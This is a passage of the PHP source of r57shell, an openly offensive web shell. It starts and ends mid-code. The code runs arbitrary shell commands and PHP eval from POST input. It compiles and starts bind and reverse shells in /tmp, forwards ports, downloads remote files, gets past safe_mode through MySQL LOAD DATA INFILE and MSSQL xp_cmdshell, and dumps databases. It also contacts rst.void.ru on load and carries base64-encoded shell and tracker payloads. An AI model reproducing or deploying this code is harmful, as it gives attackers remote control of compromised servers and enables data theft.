+QoJHJlc3VsdCkpIHsNCnByaW50IFNUREVSUiAiJCFcbiI7DQpleGl0IDA7DQp9DQppZiAoJHJlc3VsdCA9PSAwKSB7IGV4aXQgMDsgfQ0KfQ0KaWYgK +CR0aCAgJiYgICh2ZWMoJGVvdXQsIGZpbGVubygkdGgpLCAxKSAgfHwgdmVjKCRyb3V0LCBmaWxlbm8oJHRoKSwgMSkpKSB7DQpteSAkcmVzdWx0ID0g +c3lzcmVhZCgkdGgsICRjYnVmZmVyLCAxMDI0KTsNCmlmICghZGVmaW5lZCgkcmVzdWx0KSkgeyBwcmludCBTVERFUlIgIiQhXG4iOyBleGl0IDA7IH0 +NCmlmICgkcmVzdWx0ID09IDApIHtleGl0IDA7fQ0KfQ0KaWYgKCRmaCAgJiYgICR0YnVmZmVyKSB7KHByaW50ICRmaCAkdGJ1ZmZlcik7fQ0Kd2hpbG +UgKG15ICRsZW4gPSBsZW5ndGgoJHRidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJHRoLCAkdGJ1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+I +DApIHskdGJ1ZmZlciA9IHN1YnN0cigkdGJ1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfQ0Kd2hpbGUgKG15ICRs +ZW4gPSBsZW5ndGgoJGNidWZmZXIpKSB7DQpteSAkcmVzID0gc3lzd3JpdGUoJGNoLCAkY2J1ZmZlciwgJGxlbik7DQppZiAoJHJlcyA+IDApIHskY2J +1ZmZlciA9IHN1YnN0cigkY2J1ZmZlciwgJHJlcyk7fSANCmVsc2Uge3ByaW50IFNUREVSUiAiJCFcbiI7fQ0KfX19DQo="; +$c1 = "PHNjcmlwdCBsYW5ndWFnZT0iamF2YXNjcmlwdCI+aG90bG9nX2pzPSIxLjAiO2hvdGxvZ19yPSIiK01hdGgucmFuZG9tKCkrIiZzPTgxNjA2 +JmltPTEmcj0iK2VzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrIiZwZz0iK2VzY2FwZSh3aW5kb3cubG9jYXRpb24uaHJlZik7ZG9jdW1lbnQuY29va2l +lPSJob3Rsb2c9MTsgcGF0aD0vIjsgaG90bG9nX3IrPSImYz0iKyhkb2N1bWVudC5jb29raWU/IlkiOiJOIik7PC9zY3JpcHQ+PHNjcmlwdCBsYW5ndW +FnZT0iamF2YXNjcmlwdDEuMSI+aG90bG9nX2pzPSIxLjEiO2hvdGxvZ19yKz0iJmo9IisobmF2aWdhdG9yLmphdmFFbmFibGVkKCk/IlkiOiJOIik8L +3NjcmlwdD48c2NyaXB0IGxhbmd1YWdlPSJqYXZhc2NyaXB0MS4yIj5ob3Rsb2dfanM9IjEuMiI7aG90bG9nX3IrPSImd2g9IitzY3JlZW4ud2lkdGgr +J3gnK3NjcmVlbi5oZWlnaHQrIiZweD0iKygoKG5hdmlnYXRvci5hcHBOYW1lLnN1YnN0cmluZygwLDMpPT0iTWljIikpP3NjcmVlbi5jb2xvckRlcHR +oOnNjcmVlbi5waXhlbERlcHRoKTwvc2NyaXB0PjxzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQxLjMiPmhvdGxvZ19qcz0iMS4zIjwvc2NyaXB0Pj +xzY3JpcHQgbGFuZ3VhZ2U9ImphdmFzY3JpcHQiPmhvdGxvZ19yKz0iJmpzPSIraG90bG9nX2pzO2RvY3VtZW50LndyaXRlKCI8YSBocmVmPSdodHRwO +i8vY2xpY2suaG90bG9nLnJ1Lz84MTYwNicgdGFyZ2V0PSdfdG9wJz48aW1nICIrIiBzcmM9J2h0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2hv +dGxvZy9jb3VudD8iK2hvdGxvZ19yKyImJyBib3JkZXI9MCB3aWR0aD0xIGhlaWdodD0xIGFsdD0xPjwvYT4iKTwvc2NyaXB0Pjxub3NjcmlwdD48YSB +ocmVmPWh0dHA6Ly9jbGljay5ob3Rsb2cucnUvPzgxNjA2IHRhcmdldD1fdG9wPjxpbWdzcmM9Imh0dHA6Ly9oaXQ0LmhvdGxvZy5ydS9jZ2ktYmluL2 +hvdGxvZy9jb3VudD9zPTgxNjA2JmltPTEiIGJvcmRlcj0wd2lkdGg9IjEiIGhlaWdodD0iMSIgYWx0PSJIb3RMb2ciPjwvYT48L25vc2NyaXB0Pg=="; +$c2 = "PCEtLUxpdmVJbnRlcm5ldCBjb3VudGVyLS0+PHNjcmlwdCBsYW5ndWFnZT0iSmF2YVNjcmlwdCI+PCEtLQ0KZG9jdW1lbnQud3JpdGUoJzxh +IGhyZWY9Imh0dHA6Ly93d3cubGl2ZWludGVybmV0LnJ1L2NsaWNrIiAnKw0KJ3RhcmdldD1fYmxhbms+PGltZyBzcmM9Imh0dHA6Ly9jb3VudGVyLnl +hZHJvLnJ1L2hpdD90NTIuNjtyJysNCmVzY2FwZShkb2N1bWVudC5yZWZlcnJlcikrKCh0eXBlb2Yoc2NyZWVuKT09J3VuZGVmaW5lZCcpPycnOg0KJz +tzJytzY3JlZW4ud2lkdGgrJyonK3NjcmVlbi5oZWlnaHQrJyonKyhzY3JlZW4uY29sb3JEZXB0aD8NCnNjcmVlbi5jb2xvckRlcHRoOnNjcmVlbi5wa +XhlbERlcHRoKSkrJzsnK01hdGgucmFuZG9tKCkrDQonIiBhbHQ9ImxpdmVpbnRlcm5ldC5ydTog7+7q4Ofg7e4g9+jx6+4g7/Du8ezu8vDu4iDoIO/u +8eXy6PLl6+XpIOfgIDI0IPfg8eAiICcrDQonYm9yZGVyPTAgd2lkdGg9MCBoZWlnaHQ9MD48L2E+JykvLy0tPjwvc2NyaXB0PjwhLS0vTGl2ZUludGV +ybmV0LS0+"; +echo $head; +echo '</head>'; +if(empty($_POST['cmd'])) { +$serv = array(127,192,172,10); +$addr=@explode('.', $_SERVER['SERVER_ADDR']); +$current_version = str_replace('.','',$version); +if (!in_array($addr[0], $serv)) { +@print "<img src=\"http://rst.void.ru/r57shell_version/version.php?img=1&version=".$current_version."\" border=0 height=0 width=0>"; +@readfile ("http://rst.void.ru/r57shell_version/version.php?version=".$current_version."");}} +echo '<body bgcolor="#e4e0d8"><table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td bgcolor=#333333 width=160><font face=Verdana size=2>'.ws(1).'&nbsp; +<font face=Webdings size=6><b>!</b></font><b>'.ws(2).'r57shell '.$version.'</b> +</font></td><td bgcolor=#333333><font face=Verdana size=-2>'; +echo ws(2); +echo "<b>".date ("d-m-Y H:i:s")."</b>"; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpinfo title=\"".$lang[$language.'_text46']."\"><b>phpinfo</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?phpini title=\"".$lang[$language.'_text47']."\"><b>php.ini</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?cpu title=\"".$lang[$language.'_text50']."\"><b>cpu</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?mem title=\"".$lang[$language.'_text51']."\"><b>mem</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?tmp title=\"".$lang[$language.'_text48']."\"><b>tmp</b></a> ".$rb; +echo ws(2).$lb." <a href=".$_SERVER['PHP_SELF']."?delete title=\"".$lang[$language.'_text49']."\"><b>delete</b></a> ".$rb."<br>"; +echo ws(2); +echo (($safe_mode)?("safe_mode: <b><font color=green>ON</font></b>"):("safe_mode: <b><font color=red>OFF</font></b>")); +echo ws(2); +echo "PHP version: <b>".@phpversion()."</b>"; +$curl_on = @function_exists('curl_version'); +echo ws(2); +echo "cURL: ".(($curl_on)?("<b><font color=green>ON</font></b>"):("<b><font color=red>OFF</font></b>")); +echo ws(2); +echo "MySQL: <b>"; +$mysql_on = @function_exists('mysql_connect'); +if($mysql_on){ +echo "<font color=green>ON</font></b>"; } else { echo "<font color=red>OFF</font></b>"; } +echo ws(2); +echo "MSSQL: <b>"; +$mssql_on = @function_exists('mssql_connect'); +if($mssql_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "PostgreSQL: <b>"; +$pg_on = @function_exists('pg_connect'); +if($pg_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo ws(2); +echo "Oracle: <b>"; +$ora_on = @function_exists('ocilogon'); +if($ora_on){echo "<font color=green>ON</font></b>";}else{echo "<font color=red>OFF</font></b>";} +echo "<br>".ws(2); +echo "Disable functions : <b>"; +if(''==($df=@ini_get('disable_functions'))){echo "<font color=green>NONE</font></b>";}else{echo "<font color=red>$df</font></b>";} +$free = @diskfreespace($dir); +if (!$free) {$free = 0;} +$all = @disk_total_space($dir); +if (!$all) {$all = 0;} +$used = $all-$free; +$used_percent = @round(100/($all/$free),2); +echo "<br>".ws(2)."HDD Free : <b>".view_size($free)."</b> HDD Total : <b>".view_size($all)."</b>"; +echo '</font></td></tr><table> +<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000> +<tr><td align=right width=100>'; +echo $font; +if(!$windows){ +echo '<font color=blue><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +$uname = ex('uname -a'); +echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>")); +if(!$safe_mode){ +$bsd1 = ex('sysctl -n kern.ostype'); +$bsd2 = ex('sysctl -n kern.osrelease'); +$lin1 = ex('sysctl -n kernel.ostype'); +$lin2 = ex('sysctl -n kernel.osrelease'); +} +if (!empty($bsd1)&&!empty($bsd2)) { $sysctl = "$bsd1 $bsd2"; } +else if (!empty($lin1)&&!empty($lin2)) {$sysctl = "$lin1 $lin2"; } +else { $sysctl = "-"; } +echo ws(3).$sysctl."<br>"; +echo ws(3).ex('echo $OSTYPE')."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +$id = ex('id'); +echo((!empty($id))?(ws(3).$id."<br>"):(ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>")); +echo ws(3).$dir; +echo "</b></font>"; +} +else +{ +echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'</b></font><br>'; +echo "</td><td>"; +echo "<font face=Verdana size=-2 color=red><b>"; +echo ws(3).@substr(@php_uname(),0,120)."<br>"; +echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>"; +echo ws(3).@get_current_user()."<br>"; +echo ws(3).$dir."<br>"; +echo "</font>"; +} +echo "</font>"; +echo "</td></tr></table>"; +if(empty($c1)||empty($c2)) { die(); } +$f = '<br>'; +$f .= base64_decode($c1); +$f .= base64_decode($c2); +if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text") +{ +$_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\''; +} +if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_") + { + switch($_POST['what']) + { + case 'own': + @chown($_POST['param1'],$_POST['param2']); + break; + case 'grp': + @chgrp($_POST['param1'],$_POST['param2']); + break; + case 'mod': + @chmod($_POST['param1'],intval($_POST['param2'], 8)); + break; + } + $_POST['cmd']=""; + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="mk") + { + switch($_POST['what']) + { + case 'file': + if($_POST['action'] == "create") + { + if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + else { + fclose($file); + $_POST['e_name'] = $_POST['mk_name']; + $_POST['cmd']="edit_file"; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>"; + } + } + else if($_POST['action'] == "delete") + { + if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + case 'dir': + if($_POST['action'] == "create"){ + if(mkdir($_POST['mk_name'])) + { + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>"; + } + else { echo ce($_POST['mk_name']); $_POST['cmd']=""; } + } + else if($_POST['action'] == "delete"){ + if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>"; + $_POST['cmd']=""; + } + break; + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file") + { + if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); } + if(!$file=@fopen($_POST['e_name'],"r")) { echo re($_POST['e_name']); $_POST['cmd']=""; } + else { + echo $table_up3; + echo $font; + echo "<form name=save_file method=post>"; + echo ws(3)."<b>".$_POST['e_name']."</b>"; + echo "<div align=center><textarea name=e_text cols=121 rows=24>"; + echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name']))); + fclose($file); + echo "</textarea>"; + echo "<input type=hidden name=e_name value=".$_POST['e_name'].">"; + echo "<input type=hidden name=dir value=".$dir.">"; + echo "<input type=hidden name=cmd value=save_file>"; + echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">")); + echo "</div>"; + echo "</font>"; + echo "</form>"; + echo "</td></tr></table>"; + exit(); + } + } +if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file") + { + if(!$file=@fopen($_POST['e_name'],"w")) { echo we($_POST['e_name']); } + else { + @fwrite($file,$_POST['e_text']); + @fclose($file); + $_POST['cmd']=""; + echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#000000><tr><td bgcolor=#333333><div align=center><font face=Verdana size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>"; + } + } +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C")) +{ + cf("/tmp/bd.c",$port_bind_bd_c); + $blah = ex("gcc -o /tmp/bd /tmp/bd.c"); + @unlink("/tmp/bd.c"); + $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &"); + $_POST['cmd']="ps -aux | grep bd"; +} +if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl")) +{ + cf("/tmp/bdpl",$port_bind_bd_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &"); + $_POST['cmd']="ps -aux | grep bdpl"; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/back",$back_connect); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C")) +{ + cf("/tmp/back.c",$back_connect_c); + $blah = ex("gcc -o /tmp/backc /tmp/back.c"); + @unlink("/tmp/back.c"); + $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &"); + $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\""; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl")) +{ + cf("/tmp/dp",$datapipe_pl); + $p2=which("perl"); + if(empty($p2)) $p2="perl"; + $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &"); + $_POST['cmd']="ps -aux | grep dp"; +} +if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C")) +{ + cf("/tmp/dpc.c",$datapipe_c); + $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c"); + @unlink("/tmp/dpc.c"); + $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &"); + $_POST['cmd']="ps -aux | grep dpc"; +} +if (!empty($_POST['alias'])){ foreach ($aliases as $alias_name=>$alias_cmd) { if ($_POST['alias'] == $alias_name){$_POST['cmd']=$alias_cmd;}}} +if (!empty($HTTP_POST_FILES['userfile']['name'])) +{ +if(isset($_POST['nf1']) && !empty($_POST['new_name'])) { $nfn = $_POST['new_name']; } +else { $nfn = $HTTP_POST_FILES['userfile']['name']; } +@copy($HTTP_POST_FILES['userfile']['tmp_name'], + $_POST['dir']."/".$nfn) + or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>"); +} +if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file'])) +{ + switch($_POST['with']) + { + case wget: + $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file'].""; + break; + case fetch: + $_POST['cmd'] = which('fetch')." -p ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + case lynx: + $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case links: + $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case GET: + $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file'].""; + break; + case curl: + $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file'].""; + break; + } +} +echo $table_up3; +if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=($windows)?("dir"):("ls -lia"); } +else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; } +echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=122 rows=15>"; +if($safe_mode) +{ + switch($_POST['cmd']) + { + case 'safe_dir': + $d=@dir($dir); + if ($d) + { + while (false!==($file=$d->read())) + { + if ($file=="." || $file=="..") continue; + @clearstatcache(); + list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file); + if($windows){ + echo date("d.m.Y H:i",$mtime); + if(@is_dir($file)) echo " <DIR> "; else printf("% 7s ",$size); + } + else{ + $owner = @posix_getpwuid($uid); + $grgid = @posix_getgrgid($gid); + echo $inode." "; + echo perms(@fileperms($file)); + printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size); + echo date("d.m.Y H:i ",$mtime); + } + echo "$file\n"; + } + $d->close(); + } + else echo $lang[$language._text29]; + break; + case 'safe_file': + if(@is_file($_POST['file'])) + { + $file = @file($_POST['file']); + if($file) + { + $c = @sizeof($file); + for($i=0;$i<$c;$i++) { echo htmlspecialchars($file[$i]); } + } + else echo $lang[$language._text29]; + } + else echo $lang[$language._text31]; + break; + case 'test1': + $ci = @curl_init("file://".$_POST['test1_file'].""); + $cf = @curl_exec($ci); + echo $cf; + break; + case 'test2': + @include($_POST['test2_file']); + break; + case 'test3': + if(!isset($_POST['test3_port'])||empty($_POST['test3_port'])) { $_POST['test3_port'] = "3306"; } + $db = @mysql_connect('localhost:'.$_POST['test3_port'],$_POST['test3_ml'],$_POST['test3_mp']); + if($db) + { + if(@mysql_select_db($_POST['test3_md'],$db)) + { + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + @mysql_query($sql); + $sql = "CREATE TABLE `temp_r57_table` ( `file` LONGBLOB NOT NULL );"; + @mysql_query($sql); + $sql = "LOAD DATA INFILE \"".$_POST['test3_file']."\" INTO TABLE temp_r57_table;"; + @mysql_query($sql); + $sql = "SELECT * FROM temp_r57_table;"; + $r = @mysql_query($sql); + while(($r_sql = @mysql_fetch_array($r))) { echo @htmlspecialchars($r_sql[0]); } + $sql = "DROP TABLE IF EXISTS temp_r57_table;"; + + @mysql_query($sql); + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to mysql server"; + break; + case 'test4': + if(!isset($_POST['test4_port'])||empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; } + $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']); + if($db) + { + if(@mssql_select_db($_POST['test4_md'],$db)) + { + @mssql_query("drop table r57_temp_table",$db); + @mssql_query("create table r57_temp_table ( string VARCHAR (500) NULL)",$db); + @mssql_query("insert into r57_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db); + $res = mssql_query("select * from r57_temp_table",$db); + while(($row=@mssql_fetch_row($res))) + { + echo $row[0]."\r\n"; + } + @mssql_query("drop table r57_temp_table",$db); + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + } +} +else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_show")&&($_POST['cmd']!="db_query")){ + $cmd_rep = ex($_POST['cmd']); + if($windows) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; } + else { echo @htmlspecialchars($cmd_rep)."\n"; }} +if ($_POST['cmd']=="php_eval"){ + $eval = @str_replace("<?","",$_POST['php_eval']); + $eval = @str_replace("?>","",$eval); + @eval($eval);} +if ($_POST['cmd']=="db_show") + { + switch($_POST['db']) + { + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mysql_query("SHOW DATABASES", $db); + while(($row=@mysql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + + $res2 = @mysql_query("SHOW TABLES FROM ".$row[0],$db); + while(($row2=@mysql_fetch_row($res2))) + { + echo " | - ".$row2[0]."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mysql_query("SHOW COLUMNS FROM ".$row[0].".".$row2[0],$db); + while(($row3=@mysql_fetch_row($res3))) { echo " | - ".$row3[0]."\r\n"; } + } + } + } + } + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + $res=@mssql_query("sp_databases", $db); + while(($row=@mssql_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + if(isset($_POST['st'])){ + @mssql_select_db($row[0]); + $res2 = @mssql_query("sp_tables",$db); + while(($row2=@mssql_fetch_array($res2))) + { + if($row2['TABLE_TYPE'] == 'TABLE' && $row2['TABLE_NAME'] != 'dtproperties') + { + echo " | - ".$row2['TABLE_NAME']."\r\n"; + if(isset($_POST['sc'])) + { + $res3 = @mssql_query("sp_columns ".$row2[2],$db); + while(($row3=@mssql_fetch_array($res3))) { echo " | - ".$row3['COLUMN_NAME']."\r\n"; } + } + } + } + } + } + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $res=@pg_query($db,"SELECT datname FROM pg_database WHERE datistemplate='f'"); + while(($row=@pg_fetch_row($res))) + { + echo "[+] ".$row[0]."\r\n"; + } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } +if ($_POST['cmd']=="mysql_dump") + { + if(isset($_POST['dif'])) { $fp = @fopen($_POST['dif_name'], "w"); } + if((!empty($_POST['dif'])&&$fp)||(empty($_POST['dif']))){ + $sqh = "# homepage: http://rst.void.ru\r\n"; + $sqh .= "# ---------------------------------\r\n"; + $sqh .= "# date : ".date ("j F Y g:i")."\r\n"; + $sqh .= "# database : ".$_POST['mysql_db']."\r\n"; + $sqh .= "# table : ".$_POST['mysql_tbl']."\r\n"; + $sqh .= "# ---------------------------------\r\n\r\n"; + switch($_POST['db']){ + case 'MySQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '3306'; } + $db = @mysql_connect('localhost:'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mysql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MySQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $res = @mysql_query("SHOW CREATE TABLE `".$_POST['mysql_tbl']."`", $db); + $row = @mysql_fetch_row($res); + $sql1 .= $row[1]."\r\n\r\n"; + $sql1 .= "# ---------------------------------\r\n\r\n"; + $sql2 = ''; + $res = @mysql_query("SELECT * FROM `".$_POST['mysql_tbl']."`", $db); + if (@mysql_num_rows($res) > 0) { + while (($row = @mysql_fetch_assoc($res))) { + $keys = @implode("`, `", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO `".$_POST['mysql_tbl']."` (`".$keys."`) VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mysql_close($db); + } + else echo "[-] ERROR! Can't connect to MySQL server"; + break; + case 'MSSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '1433'; } + $db = @mssql_connect('localhost,'.$_POST['db_port'],$_POST['mysql_l'],$_POST['mysql_p']); + if($db) + { + if(@mssql_select_db($_POST['mysql_db'],$db)) + { + $sql1 = "# MSSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + $res = @mssql_query("SELECT * FROM ".$_POST['mysql_tbl']."", $db); + if (@mssql_num_rows($res) > 0) { + while (($row = @mssql_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + } + else echo "[-] ERROR! Can't select database"; + @mssql_close($db); + } + else echo "[-] ERROR! Can't connect to MSSQL server"; + break; + case 'PostgreSQL': + if(empty($_POST['db_port'])) { $_POST['db_port'] = '5432'; } + $str = "host='localhost' port='".$_POST['db_port']."' user='".$_POST['mysql_l']."' password='".$_POST['mysql_p']."' dbname='".$_POST['mysql_db']."'"; + $db = @pg_connect($str); + if($db) + { + $sql1 = "# PostgreSQL dump created by r57shell\r\n"; + $sql1 .= $sqh; + $sql2 = ''; + + $res = @pg_query($db,"SELECT * FROM ".$_POST['mysql_tbl'].""); + if (@pg_num_rows($res) > 0) { + while (($row = @pg_fetch_assoc($res))) { + $keys = @implode(", ", @array_keys($row)); + $values = @array_values($row); + foreach($values as $k=>$v) {$values[$k] = addslashes($v);} + $values = @implode("', '", $values); + $sql2 .= "INSERT INTO ".$_POST['mysql_tbl']." (".$keys.") VALUES ('".htmlspecialchars($values)."');\r\n"; + } + $sql2 .= "\r\n# ---------------------------------"; + } + if(!empty($_POST['dif'])&&$fp) { @fputs($fp,$sql1.$sql2); } + else { echo $sql1.$sql2; } + @pg_close($db); + } + else echo "[-] ERROR! Can't connect to PostgreSQL server"; + break; + } + } + else if(!empty($_POST['dif'])&&!$fp) { echo "[-] ERROR! Can't write in dump file"; } + } +echo "</textarea></div>"; +echo "</b>"; +echo "</td></tr></table>"; +echo "<table width=100% cellpadding=0 cellspacing=0>"; +if(!$safe_mode){ +echo $fs.$table_up1.$lang[$language.'_text2'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text3'].$arrow."</b>",in('text','cmd',85,'')); +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).ws(4).in('submit','submit',0,$lang[$language.'_butt1'])); +echo $te.$table_end1.$fe; +} +else{ +echo $fs.$table_up1.$lang[$language.'_text28'].$table_up2.$ts; +echo sr(15,"<b>".$lang[$language.'_text4'].$arrow."</b>",in('text','dir',85,$dir).in('hidden','cmd',0,'safe_dir').ws(4).in('submit','submit',0,$lang[$language.'_butt6'])); +echo $te.$table_end1.$fe; +} +echo $fs.$table_up1.$lang[$language.'_text42'].$table_up2.$ts; +echo 